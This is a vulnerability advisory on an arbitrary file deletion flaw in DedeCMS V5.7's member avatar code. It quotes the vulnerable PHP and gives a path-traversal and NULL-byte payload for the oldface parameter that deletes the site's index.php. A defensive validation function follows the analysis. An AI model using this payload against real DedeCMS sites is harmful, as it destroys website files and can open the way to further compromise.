DedeCMS <= V5.7 (Latest Version) Arbitrary File Deletion Vulnerability

Source: Internet
Author: User

Exploitation conditions:
magic_quotes_gpc = Off: a file with any extension can be deleted.
magic_quotes_gpc = On: only files with a jpg, gif or png extension can be deleted.
Deleting files of arbitrary extension also requires a PHP version that truncates paths at NULL bytes.
 
./member/edit_face.php, ./member/edit_space_info.php and other files share similar code for replacing a user's avatar, space logo and other images.
However, the program does not strictly filter the path of the old image (in fact, this parameter does not need to be submitted by the user at all), so a user can delete arbitrary images or arbitrary files.
This class of vulnerability has been reported on the Internet for a long time, but the impact is not limited to jpg, gif and png image files: when PHP truncates paths at NULL bytes and magic_quotes_gpc = Off,
files of any type can be deleted.
 
Take edit_face.php as an example. The same file also has an SQL injection vulnerability that can leak the administrator's password;
for details, see the DedeCMS latest bug analysis.
 
// ./member/edit_face.php
<?php
require_once(dirname(__FILE__)."/config.php"); // This include is the key point and decides whether the vulnerability is exploitable.
// The first two lines of config.php are what matter here:
// require_once(dirname(__FILE__).'/../include/common.inc.php');
// require_once(DEDEINC.'/filter.inc.php'); // variable overwrite

CheckRank(); // check that the user is logged in
$menutype = 'config';

if(!isset($dopost))
{
    $dopost = '';
}
if(!isset($backurl))
{
    $backurl = 'edit_face.php';
}
if($dopost == 'save')
{
    $maxlength = $cfg_max_face * 1024;
    $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;

    if(!preg_match("#^".$userdir."#", $oldface))
    {
        $oldface = '';
    }

    if(is_uploaded_file($face))
    {
        // The checks above are easily satisfied, so execution reaches this point
        if(@filesize($_FILES['face']['tmp_name']) > $maxlength)
        {
            ShowMsg("The avatar file you uploaded exceeds the system size limit: {$cfg_max_face}K!", '-1');
            exit();
        }
        // Delete the old image (the extension may differ, e.g. the original image was gif and the new one is jpg)
        if(preg_match("#\.(jpg|gif|png)$#i", $oldface) && file_exists($cfg_basedir.$oldface))
        {
            /* Only checks that the value ends in .(jpg|gif|png) and that the file exists.
               Malicious sequences such as '..' are never filtered, so the path can be walked
               back into any directory for deletion.
               When magic_quotes_gpc = Off, the _RunMagicQuotes function becomes a paper tiger
               because of the variable-overwrite issue above.
               Submitting oldface=/f/uploads/userup/6/.../../index.php000000.png
               deletes index.php in the web root.
            */
            @unlink($cfg_basedir.$oldface); // delete the file
        }
        // Upload the new avatar image
        $face = MemberUploads('face', $oldface, $cfg_ml->M_ID, 'image', 'myface', 180, 180);
    }
    // ... remainder of edit_face.php omitted
}
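As an added, defender-side example (not DedeCMS's own code), the following PHP shows how the old-image path could be validated before it reaches unlink(): NULL bytes, traversal segments and any path outside the member's own directory are rejected, and the extension is checked on the whole filename rather than the tail of the string. The $userdir and $basedir arguments and the member id 6 are assumptions standing in for the DedeCMS config values.

```php
<?php
// Added example, not DedeCMS code: validate a user-supplied "old image" path
// before it can reach unlink(). $userdir/$basedir stand in for the
// $cfg_user_dir.'/'.$cfg_ml->M_ID and $cfg_basedir values in edit_face.php
// and are assumed here.

function validate_old_face(string $oldface, string $userdir): ?string
{
    // 1. NULL bytes: never let a "name.php\0.png" string reach the filesystem.
    //    Reject outright rather than stripping.
    if (strpos($oldface, "\0") !== false) {
        return null;
    }
    // 2. Reject traversal lexically. realpath() is not used because it needs
    //    the file to exist and would follow symlinks out of the tree.
    $parts = explode('/', str_replace('\\', '/', $oldface));
    foreach ($parts as $p) {
        if ($p === '..' || $p === '.') {
            return null;
        }
    }
    $clean = '/' . implode('/', array_filter($parts, 'strlen'));
    // 3. Must sit under this member's own directory; the trailing slash stops
    //    /userup/66/ from matching /userup/6.
    $prefix = rtrim($userdir, '/') . '/';
    if (strncmp($clean, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // 4. Extension check on the whole basename, not just the end of the string.
    if (!preg_match('#^[A-Za-z0-9_\-]+\.(jpg|gif|png)$#i', basename($clean))) {
        return null;
    }
    return $clean;
}

function delete_old_face(string $basedir, string $oldface, string $userdir): bool
{
    $clean = validate_old_face($oldface, $userdir);
    if ($clean === null) {
        return false;
    }
    $target = rtrim($basedir, '/') . $clean;
    return is_file($target) && unlink($target);
}

// Constructed inputs for a member whose id is 6.
$userdir = '/uploads/userup/6';
var_dump(validate_old_face('/uploads/userup/6/myface.jpg', $userdir));     // own avatar
var_dump(validate_old_face('/uploads/userup/6/../../index.php', $userdir)); // traversal
var_dump(validate_old_face("/uploads/userup/6/a.php\0.png", $userdir));    // NULL byte
var_dump(validate_old_face('/uploads/userup/66/a.png', $userdir));         // other member
```

Only the first input yields a path; the rest return null, so delete_old_face() never calls unlink() for them.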

By c4rp3nt3r@0x50sec.org
